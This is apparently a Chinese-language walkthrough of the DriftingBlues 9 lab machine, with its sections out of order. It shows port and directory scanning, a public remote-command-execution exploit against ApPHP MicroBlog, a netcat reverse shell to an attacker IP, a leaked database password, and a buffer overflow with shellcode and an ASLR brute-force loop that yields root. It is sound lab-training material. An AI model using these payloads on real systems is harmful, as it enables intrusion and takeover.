Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq\nStarting program: \/home\/kali\/temp\/driftingblues9\/input Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library "\/lib\/x86_64-linux-gnu\/libthread_db.so.1".\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x41376641 in ?? ()<\/code><\/pre>\n\u8ba1\u7b97\u6ea2\u51fa\u957f\u5ea6<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# locate pattern_offset\n\/usr\/bin\/msf-pattern_offset\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 0x41376641\n[*] Exact match at offset 171<\/code><\/pre>\n\u9a8c\u8bc1<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# python \nPython 3.11.8 (main, Feb 7 2024, 21:52:08) [GCC 13.2.0] on linux\nType "help", "copyright", "credits" or "license" for more information.\n>>> print(171*"A"+"B"*4+80*"D")\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD<\/code><\/pre>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# gdb .\/input\nGNU gdb (Debian 13.2-1) 13.2\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType "show copying" and "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<https:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n <http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\n\nFor help, type "help".\nType "apropos word" to search for commands related to "word"...\nReading symbols from .\/input...\n(No debugging symbols found in .\/input)\n(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\nStarting program: \/home\/kali\/temp\/driftingblues9\/input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library "\/lib\/x86_64-linux-gnu\/libthread_db.so.1".\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x42424242 in ?? ()<\/code><\/pre>\n\u4f7f\u7528\u7f51\u4e0a\u627e\u5230\u7684payload\uff1ahttps:\/\/www.exploit-db.com\/exploits\/13357<\/a><\/p>\nchar sc[] = \n"\\x31\\xc0\\x31\\xdb\\xb0\\x06\\xcd\\x80"\n"\\x53\\x68\/tty\\x68\/dev\\x89\\xe3\\x31\\xc9\\x66\\xb9\\x12\\x27\\xb0\\x05\\xcd\\x80"\n"\\x31\\xc0\\x50\\x68\/\/sh\\x68\/bin\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80";\n# 55<\/code><\/pre>\npayload<\/code> 55 \u5b57\u8282\uff1a<\/p>\n\nPayload\uff1a[ NOP \/ 58] + [ shellcode \/ 55 ] + [ PAD \/ 58 ] + [ EIP ]<\/p>\n<\/blockquote>\n
\u5148\u5173\u95ed\u4e00\u4e0bkali\u7684ASLR\uff1a<\/p>\n
sudo sysctl -w kernel.randomize_va_space=0<\/code><\/pre>\n\u5728\u9776\u673a\u4e0a\u8fd0\u884c\uff1a<\/p>\n
(remote) clapton@debian:\/home\/clapton$ gdb -q input \nReading symbols from input...(no debugging symbols found)...done.\n(gdb) r $(python -c 'print("A" * 171 + "B" * 4 + "\\x90" * 64 )')\nStarting program: \/home\/clapton\/input $(python -c 'print("A" * 171 + "B" * 4 + "\\x90" * 64 )')\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x42424242 in ?? ()\n(gdb) x\/s $esp\n0xbf84e7a0: '\\220' <repeats 64 times><\/code><\/pre>\n\u6784\u9020payload\uff1a<\/p>\n
r $(python -c 'print("A" * 171 + "\\xa0\\xe7\\x84\\xbf" + "\\x90" * 1000 + "\\x31\\xc9\\xf7\\xe1\\x51\\xbf\\xd0\\xd0\\x8c\\x97\\xbe\\xd0\\x9d\\x96\\x91\\xf7\\xd7\\xf7\\xd6\\x57\\x56\\x89\\xe3\\xb0\\x0b\\xcd\\x80")')<\/code><\/pre>\nfor i in {1..10000}; do (.\/input $(python -c 'print("A" * 171 + "\\xa0\\xe7\\x84\\xbf" + "\\x90" * 1000 + "\\x31\\xc9\\xf7\\xe1\\x51\\xbf\\xd0\\xd0\\x8c\\x97\\xbe\\xd0\\x9d\\x96\\x91\\xf7\\xd7\\xf7\\xd6\\x57\\x56\\x89\\xe3\\xb0\\x0b\\xcd\\x80")')) ; done<\/code><\/pre>\n\u8fd0\u884c\u62ff\u5230flag\uff1a<\/p>\n
Segmentation fault\nSegmentation fault\nSegmentation fault\nSegmentation fault\n# whoami;id\nroot\nuid=1000(clapton) gid=1000(clapton) euid=0(root) groups=1000(clapton)\n# cd \/root\n# ls -la\ntotal 16\ndrwx------ 2 root root 4096 May 9 2021 .\ndrwxr-xr-x 21 root root 4096 May 9 2021 ..\n-rw------- 1 root root 649 May 9 2021 .bash_history\n-rw-r--r-- 1 root root 295 May 9 2021 root.txt\n# cat root.txt\n\nthis is the final of driftingblues series. i hope you've learned something from them.\n\nyou can always contact me at vault13_escape_service[at]outlook.com for your questions. (mail language: english\/turkish)\n\nyour root flag:\n\n04D4C1BEC659F1AA15B7AE731CEEDD65\n\ngood luck. ( \u0361\u00b0 \u035c\u0296 \u0361\u00b0)<\/code><\/pre>\n\u545c\u545c\u545c\uff0cpwn\u7237\u624d\u662fyyds\uff0c\u4e00\u5b9a\u8981\u5b66\u4f1apwn\uff01\uff01\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/bbs.kanxue.com\/thread-259723.htm<\/a><\/p>\nhttps:\/\/devgiants.fr\/blog\/2021\/07\/15\/drifting-blues-9-writeup\/<\/a><\/p>\nhttps:\/\/vishal-chandak.medium.com\/vulnhub-driftingblues-9-final-f39b59b3c38f<\/a><\/p>\n
rustscan -a 172.20.10.6 -- -A<\/code><\/pre>\nOpen 172.20.10.6:80\nOpen 172.20.10.6:111\nOpen 172.20.10.6:36168\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))\n|_http-title: ApPHP MicroBlog\n|_http-generator: ApPHP MicroBlog vCURRENT_VERSION\n|_http-favicon: Unknown favicon MD5: 9252836E46BB0304BED26A5B96DF4DD4\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.10 (Debian)\n| http-cookie-flags: \n| \/: \n| PHPSESSID: \n|_ httponly flag not set\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100024 1 36168\/tcp status\n| 100024 1 38464\/tcp6 status\n| 100024 1 46499\/udp6 status\n|_ 100024 1 49425\/udp status\n36168\/tcp open status syn-ack 1 (RPC #100024)<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.6\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,png\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 276]\n\/images (Status: 301) [Size: 311] [--> http:\/\/172.20.10.6\/images\/]\n\/index.php (Status: 200) [Size: 5650]\n\/docs (Status: 301) [Size: 309] [--> http:\/\/172.20.10.6\/docs\/]\n\/page (Status: 301) [Size: 309] [--> http:\/\/172.20.10.6\/page\/]\n\/header.php (Status: 200) [Size: 13]\n\/admin (Status: 301) [Size: 310] [--> http:\/\/172.20.10.6\/admin\/]\n\/footer.php (Status: 500) [Size: 614]\n\/license (Status: 301) [Size: 312] [--> http:\/\/172.20.10.6\/license\/]\n\/README.txt (Status: 200) [Size: 975]\n\/js (Status: 301) [Size: 307] [--> http:\/\/172.20.10.6\/js\/]\n\/include (Status: 301) [Size: 312] [--> http:\/\/172.20.10.6\/include\/]\n\/backup (Status: 301) [Size: 311] [--> http:\/\/172.20.10.6\/backup\/]\n\/styles (Status: 301) [Size: 311] [--> http:\/\/172.20.10.6\/styles\/]\n\/INSTALL.txt (Status: 200) [Size: 1201]\n\/.php (Status: 403) [Size: 276]\n\/wysiwyg (Status: 301) [Size: 312] [--> http:\/\/172.20.10.6\/wysiwyg\/]\n\/server-status (Status: 403) [Size: 276]\n\/mails (Status: 301) [Size: 310] [--> http:\/\/172.20.10.6\/mails\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.6<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.6\n+ Target Hostname: 172.20.10.6\n+ Target Port: 80\n+ Start Time: 2024-04-13 06:33:24 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.10 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https:\/\/portswigger.net\/kb\/issues\/00600300_private-ip-addresses-disclosed\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is "127.0.1.1". See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ Apache\/2.4.10 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/: DEBUG HTTP verb may show server debugging information. See: https:\/\/docs.microsoft.com\/en-us\/visualstudio\/debugger\/how-to-enable-debugging-for-aspnet-applications?view=vs-2017\n+ \/backup\/: Directory indexing found.\n+ \/backup\/: This might be interesting.\n+ \/images\/: Directory indexing found.\n+ \/docs\/: Directory indexing found.\n+ \/styles\/: Directory indexing found.\n+ \/INSTALL.txt: Default file found.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/admin\/home.php: Admin login page\/section found.\n+ 8103 requests: 0 error(s) and 16 item(s) reported on remote host\n+ End Time: 2024-04-13 06:33:39 (GMT-4) (15 seconds)\n---------------------------------------------------------------------------<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/172.20.10.6\/README.txt<\/code><\/pre>\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ \n\/\/ Advanced Power of PHP\n\/\/ ---------------------\n\/\/ http:\/\/www.apphp.com\n\/\/ \n\/\/ ApPHP MicroBlog Free\n\/\/\n\/\/ Version: 1.0.1\n\/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\nThank you for using ApPHP.com software!\n-----------------------------------------------------------------------------------\nIt's very easy to get started with ApPHP MicroBlog!!!\n1. Installation:\n http:\/\/apphp.com\/php-microblog\/index.php?page=installation\n2. Getting started:\n http:\/\/apphp.com\/php-microblog\/index.php?page=getting_started\nIf you have any troubles, find an example of code in the folder, named "examples" \n-----------------------------------------------------------------------------------\nFor more information visit: \n site http:\/\/apphp.com\/php-microblog\/index.php?page=examples\n forum http:\/\/www.apphp.com\/forum\/<\/code><\/pre>\nhttp:\/\/172.20.10.6\/backup\/<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.6\/wysiwyg\/<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.6\/mails\/<\/code><\/pre>\n<\/div><\/p>\n# http:\/\/172.20.10.6\/mails\/password_forgotten.txt\nHello _USER_NAME_!<br> <br>\nYou or someone else asked for your login info on our site, _WEB_SITE_\nYour Login Info:\n------------------------<br\/>\nUsername: _USER_NAME_\nPassword: _USER_PASSWORD_\n------------------<br\/>\nBest regards,\n_WEB_SITE_<\/code><\/pre>\n\u67e5\u627e\u76f8\u5173\u6f0f\u6d1e<\/h3>\n
<\/div><\/p>\n\u6709\u4e00\u4e2a\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ searchsploit -m php\/webapps\/33070.py\n Exploit: ApPHP MicroBlog 1.0.1 - Remote Command Execution\n URL: https:\/\/www.exploit-db.com\/exploits\/33070\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/33070.py\n Codes: OSVDB-106352, OSVDB-106351\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/driftingblues9\/33070.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python3 33070.py -h \n File "\/home\/kali\/temp\/driftingblues9\/33070.py", line 14\n print " -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-"\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nSyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py -h\n -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\n[*] Testing for vulnerability...\nTraceback (most recent call last):\n File "33070.py", line 38, in <module>\n r = urllib.urlopen(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 87, in urlopen\n return opener.open(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 215, in open\n return getattr(self, name)(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 471, in open_file\n return self.open_local_file(url)\n File "\/usr\/lib\/python2.7\/urllib.py", line 485, in open_local_file\n raise IOError(e.errno, e.strerror, e.filename)\nIOError: [Errno 2] No such file or directory: "-h?j);echo(base64_decode('MTQyMGM2YWZhNjVjMTY5')=\/"\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py \n -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\nUsage: python 33070.py http:\/\/target\/blog\/index.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py http:\/\/172.20.10.6 \n -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\n[*] Testing for vulnerability...\n[+] Website is vulnerable\n\n[*] Fecthing phpinfo\n PHP Version 5.6.40-0+deb8u12\n System Linux debian 3.16.0-4-586 #1 Debian 3.16.51-2 (2017-12-03) i686\n Loaded Configuration File \/etc\/php5\/apache2\/php.ini\n Apache Version Apache\/2.4.10 (Debian)\n User\/Group www-data(33)\/33\n Server Root \/etc\/apache2\n DOCUMENT_ROOT \/var\/www\/html\n PHP Version 5.6.40-0+deb8u12\n allow_url_fopen On On\n allow_url_include Off Off\n disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,\n open_basedir no value no value\n System V Message based IPC Wez Furlong\n System V Semaphores Tom May\n System V Shared Memory Christian Cartus\n\n[*] Fetching include\/base.inc.php\n<?php\n \/\/ DATABASE CONNECTION INFORMATION\n define('DATABASE_HOST', 'localhost'); \/\/ Database host\n define('DATABASE_NAME', 'microblog'); \/\/ Name of the database to be used\n define('DATABASE_USERNAME', 'clapton'); \/\/ User name for access to database\n define('DATABASE_PASSWORD', 'yaraklitepe'); \/\/ Password for access to database\n define('DB_ENCRYPT_KEY', 'p52plaiqb8'); \/\/ Database encryption key\n define('DB_PREFIX', 'mb101_'); \/\/ Unique prefix of all table names in the database\n ?>\n\n[*] Testing remote execution\n[+] Remote exec is working with system() :)\nSubmit your commands, type exit to quit\n> whoami\nwww-data\n\n> nc -e \/bin\/bash 172.20.10.8 1234<\/code><\/pre>\n\u6267\u884c\u6210\u529f\uff01<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@debian:\/var\/www\/html$ ls -la\ntotal 84\ndrwxr-xr-x 13 root root 4096 May 9 2021 .\ndrwxr-xr-x 3 root root 4096 May 9 2021 ..\n-rw-r--r-- 1 root root 1039 May 20 2009 .htaccess\n-rw-r--r-- 1 root root 1201 Jan 29 2014 INSTALL.txt\n-rw-r--r-- 1 root root 975 Jan 29 2014 README.txt\ndrwxr-xr-x 3 root root 4096 May 9 2021 admin\ndrwxr-xr-x 2 root root 4096 May 9 2021 backup\ndrwxr-xr-x 2 root root 4096 May 9 2021 docs\n-rw-r--r-- 1 root root 1191 Jan 29 2014 footer.php\n-rw-r--r-- 1 root root 1653 Nov 15 2009 header.php\ndrwxr-xr-x 4 root root 4096 May 9 2021 images\ndrwxrwxrwx 3 root root 4096 May 9 2021 include\n-rw-r--r-- 1 root root 6409 Mar 10 2014 index.php\ndrwxr-xr-x 2 root root 4096 May 9 2021 js\ndrwxr-xr-x 2 root root 4096 May 9 2021 license\ndrwxr-xr-x 2 root root 4096 May 9 2021 mails\ndrwxr-xr-x 2 root root 4096 May 9 2021 page\n-rw-r--r-- 1 root root 1728 Feb 3 2014 rss.xml\ndrwxr-xr-x 4 root root 4096 May 9 2021 styles\ndrwxr-xr-x 8 root root 4096 May 9 2021 wysiwyg\n(remote) www-data@debian:\/var\/www\/html$ sudo -l\nbash: sudo: command not found\n(remote) www-data@debian:\/var\/www\/html$ cd \/home\n(remote) www-data@debian:\/home$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 May 9 2021 .\ndrwxr-xr-x 21 root root 4096 May 9 2021 ..\ndr-x------ 2 clapton clapton 4096 May 9 2021 clapton\n(remote) www-data@debian:\/home$ cd clapton\/\nbash: cd: clapton\/: Permission denied\n(remote) www-data@debian:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:103:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:104:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:105:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nDebian-exim:x:104:109::\/var\/spool\/exim4:\/bin\/false\nstatd:x:105:65534::\/var\/lib\/nfs:\/bin\/false\nmessagebus:x:106:112::\/var\/run\/dbus:\/bin\/false\nmysql:x:107:114:MySQL Server,,,:\/var\/lib\/mysql:\/bin\/false\nclapton:x:1000:1000:,,,:\/home\/clapton:\/bin\/bash\n(remote) www-data@debian:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user command\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@debian:\/home$ su clapton \nPassword: \nsu: Authentication failure\n(remote) www-data@debian:\/home$ su root\nPassword: \nsu: Authentication failure\n(remote) www-data@debian:\/home$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/bin\/su\n\/bin\/mount\n\/bin\/umount\n\/sbin\/mount.nfs\n\/usr\/bin\/procmail\n\/usr\/bin\/at\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/sbin\/exim4\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n........\n(remote) www-data@debian:\/var\/www\/html\/include$ cat base.inc.php \n<?php\n \/\/ DATABASE CONNECTION INFORMATION\n define('DATABASE_HOST', 'localhost'); \/\/ Database host\n define('DATABASE_NAME', 'microblog'); \/\/ Name of the database to be used\n define('DATABASE_USERNAME', 'clapton'); \/\/ User name for access to database\n define('DATABASE_PASSWORD', 'yaraklitepe'); \/\/ Password for access to database\n define('DB_ENCRYPT_KEY', 'p52plaiqb8'); \/\/ Database encryption key\n define('DB_PREFIX', 'mb101_'); \/\/ Unique prefix of all table names in the database\n ?><\/code><\/pre>\n\u627e\u5230\u5bc6\u7801\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
